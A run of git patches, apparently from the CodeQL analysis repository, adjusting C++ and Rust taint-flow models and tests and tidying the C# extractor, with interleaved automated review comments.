| | atl.cpp:291:8:291:12 | SetAt | 1 | INARGTYPclass:0 | | atl.cpp:401:8:401:8 | operator= | 0 | IUnknown && | | atl.cpp:401:8:401:8 | operator= | 0 | const IUnknown & | 
From de75e033beb7b871e23f7dc706fd904bcbf19529 Mon Sep 17 00:00:00 2001
From: Mathias Vorreiter Pedersen
Date: Wed, 4 Dec 2024 12:42:48 +0000
Subject: [PATCH 0795/1267] C++: Remove taint to POSITIONs.
---
 cpp/ql/lib/ext/CAtlList.model.yml | 6 ------
 1 file changed, 6 deletions(-)
diff --git a/cpp/ql/lib/ext/CAtlList.model.yml b/cpp/ql/lib/ext/CAtlList.model.yml
index eb59fb8417e..411b9390a9c 100644
--- a/cpp/ql/lib/ext/CAtlList.model.yml
+++ b/cpp/ql/lib/ext/CAtlList.model.yml
@@ -7,9 +7,7 @@ extensions:
 - ["", "CAtlList", True, "AddHeadList", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"]
 - ["", "CAtlList", True, "AddTail", "", "", "Argument[*@0]", "Argument[-1].Element[@]", "value", "manual"]
 - ["", "CAtlList", True, "AddTailList", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"]
- - ["", "CAtlList", True, "FindIndex", "", "", "Argument[0]", "ReturnValue", "taint", "manual"]
 - ["", "CAtlList", True, "GetAt", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"]
- - ["", "CAtlList", True, "GetAt", "", "", "Argument[0]", "ReturnValue[*@]", "taint", "manual"]
 - ["", "CAtlList", True, "GetHead", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"]
 - ["", "CAtlList", True, "GetHeadPosition", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"]
 - ["", "CAtlList", True, "GetNext", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"]
@@ -17,9 +15,5 @@ extensions: - ["", "CAtlList", True, "GetTail", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - ["", "CAtlList", True, "GetTailPosition", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["", "CAtlList", True, "InsertAfter", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CAtlList", True, "InsertAfter", "", "", "Argument[*@1]", "ReturnValue", "taint", "manual"] - ["", "CAtlList", True, "InsertBefore", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CAtlList", True, "InsertBefore", "", "", "Argument[*@1]", "ReturnValue", "taint", "manual"] - ["", "CAtlList", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "taint", "manual"] - - ["", "CAtlList", True, "SwapElements", "", "", "Argument[0]", "Argument[1]", "taint", "manual"] - - ["", "CAtlList", True, "SwapElements", "", "", "Argument[1]", "Argument[0]", "taint", "manual"] From 9dc3aecf67e2a5fcf47b2b5c10ccd37b4d7ae152 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 4 Dec 2024 12:48:55 +0000 Subject: [PATCH 0796/1267] C++: Remove more taint to POSITIONs. --- cpp/ql/lib/ext/CAtlList.model.yml | 2 -- 1 file changed, 2 deletions(-) diff --git a/cpp/ql/lib/ext/CAtlList.model.yml b/cpp/ql/lib/ext/CAtlList.model.yml index 411b9390a9c..4b724ce717c 100644 --- a/cpp/ql/lib/ext/CAtlList.model.yml +++ b/cpp/ql/lib/ext/CAtlList.model.yml 
@@ -9,11 +9,9 @@ extensions: - ["", "CAtlList", True, "AddTailList", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] - ["", "CAtlList", True, "GetAt", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - ["", "CAtlList", True, "GetHead", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - - ["", "CAtlList", True, "GetHeadPosition", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["", "CAtlList", True, "GetNext", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["", "CAtlList", True, "GetPrev", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["", "CAtlList", True, "GetTail", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - - ["", "CAtlList", True, "GetTailPosition", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["", "CAtlList", True, "InsertAfter", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] - ["", "CAtlList", True, "InsertBefore", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] - ["", "CAtlList", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "taint", "manual"] From c7dee4b02050448973eeb14c979fe7b254321bb3 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 4 Dec 2024 12:52:13 +0000 Subject: [PATCH 0797/1267] C++: Remove more taint to POSITIONs. --- cpp/ql/lib/ext/CAtlList.model.yml | 2 -- 1 file changed, 2 deletions(-) diff --git a/cpp/ql/lib/ext/CAtlList.model.yml b/cpp/ql/lib/ext/CAtlList.model.yml index 4b724ce717c..a2de8a645d0 100644 --- a/cpp/ql/lib/ext/CAtlList.model.yml +++ b/cpp/ql/lib/ext/CAtlList.model.yml 
@@ -9,8 +9,6 @@ extensions: - ["", "CAtlList", True, "AddTailList", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] - ["", "CAtlList", True, "GetAt", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - ["", "CAtlList", True, "GetHead", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - - ["", "CAtlList", True, "GetNext", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - - ["", "CAtlList", True, "GetPrev", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["", "CAtlList", True, "GetTail", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - ["", "CAtlList", True, "InsertAfter", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] - ["", "CAtlList", True, "InsertBefore", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] From 279a30c7e80300d7ae5ffc003c5e1bff0bf1c5bd Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 4 Dec 2024 12:52:41 +0000 Subject: [PATCH 0798/1267] C++: Make 'SetAt' a value-preserving step. --- cpp/ql/lib/ext/CAtlList.model.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/ext/CAtlList.model.yml b/cpp/ql/lib/ext/CAtlList.model.yml index a2de8a645d0..6d952f2ca13 100644 --- a/cpp/ql/lib/ext/CAtlList.model.yml +++ b/cpp/ql/lib/ext/CAtlList.model.yml @@ -12,4 +12,4 @@ extensions: - ["", "CAtlList", True, "GetTail", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - ["", "CAtlList", True, "InsertAfter", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] - ["", "CAtlList", True, "InsertBefore", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CAtlList", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "taint", "manual"] + - ["", "CAtlList", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] 
From a19f1d0b8b7f50fae9a72ed1e3014718bfc133e8 Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Wed, 4 Dec 2024 14:01:53 +0100 Subject: [PATCH 0799/1267] Rust: Remove store step for repeat operand in array expression --- .../codeql/rust/dataflow/internal/DataFlowImpl.qll | 11 ++++++----- .../dataflow/local/DataFlowStep.expected | 1 - 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll index fb82df30f9c..aa919afc894 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll @@ -984,11 +984,12 @@ module RustDataFlow implements InputSig { node2.asExpr() = tuple ) or - exists(ArrayExprCfgNode arr | - c instanceof ArrayElementContent and - node1.asExpr() = arr.getAnExpr() and - node2.asExpr() = arr - ) + c instanceof ArrayElementContent and + node1.asExpr() = + [ + node2.asExpr().(ArrayRepeatExprCfgNode).getRepeatOperand(), + node2.asExpr().(ArrayListExprCfgNode).getAnExpr() + ] or tupleAssignment(node1, node2.(PostUpdateNode).getPreUpdateNode(), c) or diff --git a/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected b/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected index a53b39840a7..f637b80dac2 100644 --- a/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected +++ b/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected 
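Review bot: In DataFlowImpl.qll the array store step is now a bare `c instanceof ArrayElementContent and node1.asExpr() = [...]` placed between `or` branches, with no comment saying why the two array forms are handled differently. A one-line comment above it would record the intent, for example `// for [e; n] only the repeated operand e is stored as an element, never the length n`. Wrapping the conjunction in parentheses would also make its grouping with the neighbouring `or` branches explicit instead of relying on operator precedence. The enclosing predicate starts and ends outside the hunk.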
@@ -524,7 +524,6 @@ storeStep | main.rs:336:20:336:20 | 2 | array[] | main.rs:336:16:336:33 | [...] | | main.rs:336:23:336:32 | source(...) | array[] | main.rs:336:16:336:33 | [...] | | main.rs:340:17:340:26 | source(...) | array[] | main.rs:340:16:340:31 | [...; 10] | -| main.rs:340:29:340:30 | 10 | array[] | main.rs:340:16:340:31 | [...; 10] | | main.rs:344:17:344:17 | 1 | array[] | main.rs:344:16:344:24 | [...] | | main.rs:344:20:344:20 | 2 | array[] | main.rs:344:16:344:24 | [...] | | main.rs:344:23:344:23 | 3 | array[] | main.rs:344:16:344:24 | [...] | From 3004639fca8214166994cbfe759b951d450b94b6 Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Wed, 4 Dec 2024 13:30:39 +0100 Subject: [PATCH 0800/1267] Rust: Add default taint flow steps --- .../dataflow/internal/TaintTrackingImpl.qll | 34 +++++++++++++++++-- .../library-tests/dataflow/models/main.rs | 2 +- .../dataflow/models/models.expected | 6 ++++ .../dataflow/taint/TaintFlowStep.expected | 8 +++++ .../dataflow/taint/inline-taint-flow.expected | 12 +++++++ .../test/library-tests/dataflow/taint/main.rs | 6 ++-- 6 files changed, 62 insertions(+), 6 deletions(-) diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll index 917ce0aea45..faf80143b54 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll 
@@ -1,15 +1,45 @@ private import rust private import codeql.dataflow.TaintTracking +private import codeql.rust.controlflow.CfgNodes +private import DataFlowImpl +private import codeql.rust.dataflow.FlowSummary +private import FlowSummaryImpl as FlowSummaryImpl private import DataFlowImpl module RustTaintTracking implements InputSig { predicate defaultTaintSanitizer(Node::Node node) { none() } /** - * Holds if the additional step from `src` to `sink` should be included in all + * Holds if the additional step from `pred` to `succ` should be included in all * global taint flow configurations. */ - predicate defaultAdditionalTaintStep(Node::Node src, Node::Node sink, string model) { none() } + predicate defaultAdditionalTaintStep(Node::Node pred, Node::Node succ, string model) { + model = "" and + ( + exists(BinaryExprCfgNode binary | + binary.getOperatorName() = ["+", "-", "*", "/", "%", "&", "|", "^", "<<", ">>"] and + pred.asExpr() = [binary.getLhs(), binary.getRhs()] and + succ.asExpr() = binary + ) + or + exists(PrefixExprCfgNode prefix | + prefix.getOperatorName() = ["-", "!"] and + pred.asExpr() = prefix.getExpr() and + succ.asExpr() = prefix + ) + or + pred.asExpr() = succ.asExpr().(CastExprCfgNode).getExpr() + or + exists(IndexExprCfgNode index | + index.getIndex() instanceof RangeExprCfgNode and + pred.asExpr() = index.getBase() and + succ.asExpr() = index + ) + ) + or + FlowSummaryImpl::Private::Steps::summaryLocalStep(pred.(Node::FlowSummaryNode).getSummaryNode(), + succ.(Node::FlowSummaryNode).getSummaryNode(), false, model) + } /** * Holds if taint flow configurations should allow implicit reads of `c` at sinks diff --git a/rust/ql/test/library-tests/dataflow/models/main.rs b/rust/ql/test/library-tests/dataflow/models/main.rs index 899736aec65..337cec5a220 100644 --- a/rust/ql/test/library-tests/dataflow/models/main.rs +++ b/rust/ql/test/library-tests/dataflow/models/main.rs 
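Review bot: The added `private import DataFlowImpl` in TaintTrackingImpl.qll repeats the import that is still present as the last line of the import block, so the new line can be dropped. The doc comment on `defaultAdditionalTaintStep` only says the step is included in all global taint configurations. Since every taint query inherits these steps, it should list them: the ten arithmetic, bitwise and shift operators, prefix `-` and `!`, `as` casts, indexing with a range, and the flow-summary steps. With `defaultTaintSanitizer` still `none()`, operators such as `%`, `&` and `!` propagate taint unconditionally, which may need per-query barriers to keep results precise.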
@@ -23,7 +23,7 @@ fn coerce(_i: i64) -> i64 { fn test_coerce() { let s = source(14); - sink(coerce(s)); // $ MISSING: hasTaintFlow=14 + sink(coerce(s)); // $ hasTaintFlow=14 } enum MyPosEnum { diff --git a/rust/ql/test/library-tests/dataflow/models/models.expected b/rust/ql/test/library-tests/dataflow/models/models.expected index 3aea90c7fb3..6ebc72099ca 100644 --- a/rust/ql/test/library-tests/dataflow/models/models.expected +++ b/rust/ql/test/library-tests/dataflow/models/models.expected @@ -4,6 +4,8 @@ edges | main.rs:15:13:15:21 | source(...) | main.rs:16:19:16:19 | s | provenance | | | main.rs:16:19:16:19 | s | main.rs:16:10:16:20 | identity(...) | provenance | | | main.rs:16:19:16:19 | s | main.rs:16:10:16:20 | identity(...) | provenance | | +| main.rs:25:13:25:22 | source(...) | main.rs:26:17:26:17 | s | provenance | | +| main.rs:26:17:26:17 | s | main.rs:26:10:26:18 | coerce(...) | provenance | | | main.rs:40:13:40:21 | source(...) | main.rs:41:27:41:27 | s | provenance | | | main.rs:40:13:40:21 | source(...) | main.rs:41:27:41:27 | s | provenance | | | main.rs:41:14:41:28 | ...::A(...) [A] | main.rs:42:22:42:23 | e1 [A] | provenance | | @@ -47,6 +49,9 @@ nodes | main.rs:16:10:16:20 | identity(...) | semmle.label | identity(...) | | main.rs:16:19:16:19 | s | semmle.label | s | | main.rs:16:19:16:19 | s | semmle.label | s | +| main.rs:25:13:25:22 | source(...) | semmle.label | source(...) | +| main.rs:26:10:26:18 | coerce(...) | semmle.label | coerce(...) | +| main.rs:26:17:26:17 | s | semmle.label | s | | main.rs:40:13:40:21 | source(...) | semmle.label | source(...) | | main.rs:40:13:40:21 | source(...) | semmle.label | source(...) | | main.rs:41:14:41:28 | ...::A(...) [A] | semmle.label | ...::A(...) [A] | 
@@ -97,6 +102,7 @@ invalidSpecComponent #select | main.rs:16:10:16:20 | identity(...) | main.rs:15:13:15:21 | source(...) | main.rs:16:10:16:20 | identity(...) | $@ | main.rs:15:13:15:21 | source(...) | source(...) | | main.rs:16:10:16:20 | identity(...) | main.rs:15:13:15:21 | source(...) | main.rs:16:10:16:20 | identity(...) | $@ | main.rs:15:13:15:21 | source(...) | source(...) | +| main.rs:26:10:26:18 | coerce(...) | main.rs:25:13:25:22 | source(...) | main.rs:26:10:26:18 | coerce(...) | $@ | main.rs:25:13:25:22 | source(...) | source(...) | | main.rs:42:10:42:24 | get_var_pos(...) | main.rs:40:13:40:21 | source(...) | main.rs:42:10:42:24 | get_var_pos(...) | $@ | main.rs:40:13:40:21 | source(...) | source(...) | | main.rs:42:10:42:24 | get_var_pos(...) | main.rs:40:13:40:21 | source(...) | main.rs:42:10:42:24 | get_var_pos(...) | $@ | main.rs:40:13:40:21 | source(...) | source(...) | | main.rs:57:33:57:33 | i | main.rs:53:13:53:21 | source(...) | main.rs:57:33:57:33 | i | $@ | main.rs:53:13:53:21 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.expected b/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.expected index e69de29bb2d..04b8539a2ee 100644 --- a/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.expected +++ b/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.expected @@ -0,0 +1,8 @@ +| main.rs:4:5:4:8 | 1000 | main.rs:4:5:4:12 | ... + ... | | +| main.rs:4:12:4:12 | i | main.rs:4:5:4:12 | ... + ... | | +| main.rs:13:10:13:10 | a | main.rs:13:10:13:14 | ... + ... | | +| main.rs:13:14:13:14 | 1 | main.rs:13:10:13:14 | ... + ... | | +| main.rs:18:11:18:11 | a | main.rs:18:10:18:11 | - ... | | +| main.rs:23:13:23:13 | a | main.rs:23:13:23:19 | a as u8 | | +| main.rs:24:10:24:10 | b | main.rs:24:10:24:17 | b as i64 | | +| main.rs:38:23:38:23 | s | main.rs:38:23:38:29 | s[...] | | 
diff --git a/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.expected b/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.expected index 4e4a41dfc62..37ea5f51c78 100644 --- a/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.expected +++ b/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.expected @@ -1,6 +1,18 @@ models edges +| main.rs:12:13:12:22 | source(...) | main.rs:13:10:13:14 | ... + ... | provenance | | +| main.rs:17:13:17:22 | source(...) | main.rs:18:10:18:11 | - ... | provenance | | +| main.rs:22:13:22:22 | source(...) | main.rs:24:10:24:17 | b as i64 | provenance | | nodes +| main.rs:12:13:12:22 | source(...) | semmle.label | source(...) | +| main.rs:13:10:13:14 | ... + ... | semmle.label | ... + ... | +| main.rs:17:13:17:22 | source(...) | semmle.label | source(...) | +| main.rs:18:10:18:11 | - ... | semmle.label | - ... | +| main.rs:22:13:22:22 | source(...) | semmle.label | source(...) | +| main.rs:24:10:24:17 | b as i64 | semmle.label | b as i64 | subpaths testFailures #select +| main.rs:13:10:13:14 | ... + ... | main.rs:12:13:12:22 | source(...) | main.rs:13:10:13:14 | ... + ... | $@ | main.rs:12:13:12:22 | source(...) | source(...) | +| main.rs:18:10:18:11 | - ... | main.rs:17:13:17:22 | source(...) | main.rs:18:10:18:11 | - ... | $@ | main.rs:17:13:17:22 | source(...) | source(...) | +| main.rs:24:10:24:17 | b as i64 | main.rs:22:13:22:22 | source(...) | main.rs:24:10:24:17 | b as i64 | $@ | main.rs:22:13:22:22 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/taint/main.rs b/rust/ql/test/library-tests/dataflow/taint/main.rs index 9029b883dc7..0ce5ba06391 100644 --- a/rust/ql/test/library-tests/dataflow/taint/main.rs +++ b/rust/ql/test/library-tests/dataflow/taint/main.rs 
@@ -10,18 +10,18 @@ fn sink(s: i64) { fn addition() { let a = source(42); - sink(a + 1); // $ MISSING: hasTaintFlow=42 + sink(a + 1); // $ hasTaintFlow=42 } fn negation() { let a = source(17); - sink(-a); // $ MISSING: hasTaintFlow=17 + sink(-a); // $ hasTaintFlow=17 } fn cast() { let a = source(77); let b = a as u8; - sink(b as i64); // $ MISSING: hasTaintFlow=77 + sink(b as i64); // $ hasTaintFlow=77 } mod string { From c6d2bf2046a94d3155699e7e305c9e3330882b5e Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 4 Dec 2024 14:31:39 +0100 Subject: [PATCH 0801/1267] C#: Add extra flag to tracing debugging launch. --- csharp/.vscode/launch.json | 1 + 1 file changed, 1 insertion(+) diff --git a/csharp/.vscode/launch.json b/csharp/.vscode/launch.json index f5b4aa79cc1..75a43a6f9aa 100644 --- a/csharp/.vscode/launch.json +++ b/csharp/.vscode/launch.json @@ -75,6 +75,7 @@ "env": {}, "stopAtEntry": true, "justMyCode": false, + "requireExactSource": false, "suppressJITOptimizations": true }, ] From 57c3b571ab9fa13e7197ae762d89c5dd4fe082e6 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 4 Dec 2024 14:32:16 +0100 Subject: [PATCH 0802/1267] C#: Narrow types to SingleVariableDesignation syntax (to avoid future compiler warning). --- .../Entities/Expressions/Patterns/Pattern.cs | 23 +++++++++---------- .../Expressions/Patterns/RecursivePattern.cs | 2 +- 2 files changed, 12 insertions(+), 13 deletions(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Patterns/Pattern.cs b/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Patterns/Pattern.cs index d59f3013c98..70c755b51d5 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Patterns/Pattern.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Patterns/Pattern.cs 
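Review bot: The updated cases in taint/main.rs exercise only `a + 1`, `-a` and the two `as` casts, while the taint step added in the same commit also covers `!` and nine further binary operators. TaintFlowStep.expected from this commit lists only `+`, prefix `-`, `as` and one `s[...]` step, so the remaining operator names appear to be pinned by no test. Adding cases such as `sink(!a); // $ hasTaintFlow=<n>` and `sink(a << 1); // $ hasTaintFlow=<n>` would catch a typo in either operator list. The file continues outside the hunk.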
@@ -28,20 +28,20 @@ namespace Semmle.Extraction.CSharp.Entities.Expressions case DeclarationPatternSyntax declPattern: // Creates a single local variable declaration. { - if (declPattern.Designation is VariableDesignationSyntax designation) + switch (declPattern.Designation) { - if (cx.GetModel(syntax).GetDeclaredSymbol(designation) is ILocalSymbol symbol) - { - var type = symbol.GetAnnotatedType(); - return VariableDeclaration.Create(cx, symbol, type, declPattern.Type, cx.CreateLocation(syntax.GetLocation()), false, parent, child); - } - if (designation is DiscardDesignationSyntax) - { + case SingleVariableDesignationSyntax singleDesignation: + if (cx.GetModel(syntax).GetDeclaredSymbol(singleDesignation) is ILocalSymbol symbol) + { + var type = symbol.GetAnnotatedType(); + return VariableDeclaration.Create(cx, symbol, type, declPattern.Type, cx.CreateLocation(syntax.GetLocation()), false, parent, child); + } + throw new InternalError(singleDesignation, "Unable to get the declared symbol of the declaration pattern designation."); + case DiscardDesignationSyntax _: return Expressions.TypeAccess.Create(cx, declPattern.Type, parent, child); - } - throw new InternalError(designation, "Designation pattern not handled"); + default: + throw new InternalError($"declaration pattern designation of type {declPattern.Designation.GetType()} is unhandled"); } - throw new InternalError(declPattern, "Declaration pattern not handled"); } case RecursivePatternSyntax recPattern: @@ -59,7 +59,6 @@ namespace Semmle.Extraction.CSharp.Entities.Expressions if (cx.GetModel(syntax).GetDeclaredSymbol(varDesignation) is ILocalSymbol symbol) { var type = symbol.GetAnnotatedType(); - return VariableDeclaration.Create(cx, symbol, type, null, cx.CreateLocation(syntax.GetLocation()), true, parent, child); } 
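Review bot: The new `default:` branch of the `switch` on `declPattern.Designation` in Pattern.cs throws `InternalError` with a message only. The code it replaces passed the syntax node (`new InternalError(declPattern, "Declaration pattern not handled")`), so the unhandled pattern presumably no longer carries its source location. Passing the node keeps the diagnostic traceable: `throw new InternalError(declPattern, $"declaration pattern designation of type {declPattern.Designation.GetType()} is unhandled");`. The enclosing method starts and ends outside the hunk.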
diff --git a/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Patterns/RecursivePattern.cs b/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Patterns/RecursivePattern.cs index 514867770b6..febbdacd14c 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Patterns/RecursivePattern.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Patterns/RecursivePattern.cs @@ -22,7 +22,7 @@ namespace Semmle.Extraction.CSharp.Entities.Expressions Expressions.TypeAccess.Create(cx, t, this, 1); // Extract the local variable declaration - if (syntax.Designation is VariableDesignationSyntax designation && cx.GetModel(syntax).GetDeclaredSymbol(designation) is ILocalSymbol symbol) + if (syntax.Designation is SingleVariableDesignationSyntax designation && cx.GetModel(syntax).GetDeclaredSymbol(designation) is ILocalSymbol symbol) { var type = symbol.GetAnnotatedType(); From dde0281d25a7653359a593915620ef188940387f Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 25 Nov 2024 13:19:59 +0100 Subject: [PATCH 0803/1267] C#: Use dedicated lock type where applicable. --- .../NugetPackageRestorer.cs | 5 ++--- .../Semmle.Extraction.CSharp/Extractor/ExtractionContext.cs | 3 ++- csharp/extractor/Semmle.Util/Logging/PidStreamWriter.cs | 4 ++-- csharp/extractor/Testrunner/Testrunner.cs | 2 +- 4 files changed, 7 insertions(+), 7 deletions(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs index 3895db3e4d4..f30760981f3 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs 
@@ -4,7 +4,6 @@ using System.Collections.Generic; using System.IO; using System.Linq; using System.Net.Http; -using System.Security.Cryptography; using System.Text; using System.Text.RegularExpressions; using System.Threading; @@ -264,7 +263,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching var isWindows = fileContent.UseWindowsForms || fileContent.UseWpf; - var sync = new object(); + var sync = new Lock(); var projectGroups = projects.GroupBy(Path.GetDirectoryName); Parallel.ForEach(projectGroups, new ParallelOptions { MaxDegreeOfParallelism = DependencyManager.Threads }, projectGroup => { @@ -346,7 +345,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching compilationInfoContainer.CompilationInfos.Add(("Fallback nuget restore", notYetDownloadedPackages.Count.ToString())); var successCount = 0; - var sync = new object(); + var sync = new Lock(); Parallel.ForEach(notYetDownloadedPackages, new ParallelOptions { MaxDegreeOfParallelism = DependencyManager.Threads }, package => { diff --git a/csharp/extractor/Semmle.Extraction.CSharp/Extractor/ExtractionContext.cs b/csharp/extractor/Semmle.Extraction.CSharp/Extractor/ExtractionContext.cs index 619eb995347..262475ca5a1 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp/Extractor/ExtractionContext.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp/Extractor/ExtractionContext.cs @@ -1,4 +1,5 @@ using System.Collections.Generic; +using System.Threading; using Semmle.Util.Logging; using CompilationInfo = (string key, string value); @@ -38,7 +39,7 @@ namespace Semmle.Extraction.CSharp // to handle pathological cases. private const int maxErrors = 1000; - private readonly object mutex = new object(); + private readonly Lock mutex = new(); public void Message(Message msg) { diff --git a/csharp/extractor/Semmle.Util/Logging/PidStreamWriter.cs b/csharp/extractor/Semmle.Util/Logging/PidStreamWriter.cs index 7d9599298d6..cf4d8be52e5 100644 --- a/csharp/extractor/Semmle.Util/Logging/PidStreamWriter.cs 
+++ b/csharp/extractor/Semmle.Util/Logging/PidStreamWriter.cs @@ -1,5 +1,5 @@ using System.IO; -using System.Diagnostics; +using System.Threading; namespace Semmle.Util.Logging { @@ -33,6 +33,6 @@ namespace Semmle.Util.Logging WriteLine(format is null ? format : string.Format(format, args)); } - private readonly object mutex = new object(); + private readonly Lock mutex = new(); } } diff --git a/csharp/extractor/Testrunner/Testrunner.cs b/csharp/extractor/Testrunner/Testrunner.cs index 6280a8c1be2..d772ca903f7 100644 --- a/csharp/extractor/Testrunner/Testrunner.cs +++ b/csharp/extractor/Testrunner/Testrunner.cs @@ -14,7 +14,7 @@ using System; /// public class Testrunner { - private static readonly object ConsoleLock = new(); + private static readonly Lock ConsoleLock = new(); private static readonly ManualResetEvent Finished = new(false); From 38e3913fa90618fe6d7f9cebf39ab2209066772a Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 27 Nov 2024 10:03:17 +0100 Subject: [PATCH 0804/1267] C#: Remove redundant using statements. --- .../extractor/Semmle.Extraction.CSharp.Standalone/Options.cs | 4 +--- .../extractor/Semmle.Extraction.CSharp.Standalone/Program.cs | 5 ----- 2 files changed, 1 insertion(+), 8 deletions(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.Standalone/Options.cs b/csharp/extractor/Semmle.Extraction.CSharp.Standalone/Options.cs index 39c363a7753..64d7535ee2a 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.Standalone/Options.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.Standalone/Options.cs @@ -1,8 +1,6 @@ +using System; using System.IO; using Semmle.Util; -using Semmle.Util.Logging; -using Semmle.Extraction.CSharp.DependencyFetching; -using System; namespace Semmle.Extraction.CSharp.Standalone { diff --git a/csharp/extractor/Semmle.Extraction.CSharp.Standalone/Program.cs b/csharp/extractor/Semmle.Extraction.CSharp.Standalone/Program.cs index fc13b774f4f..475847be576 100644 
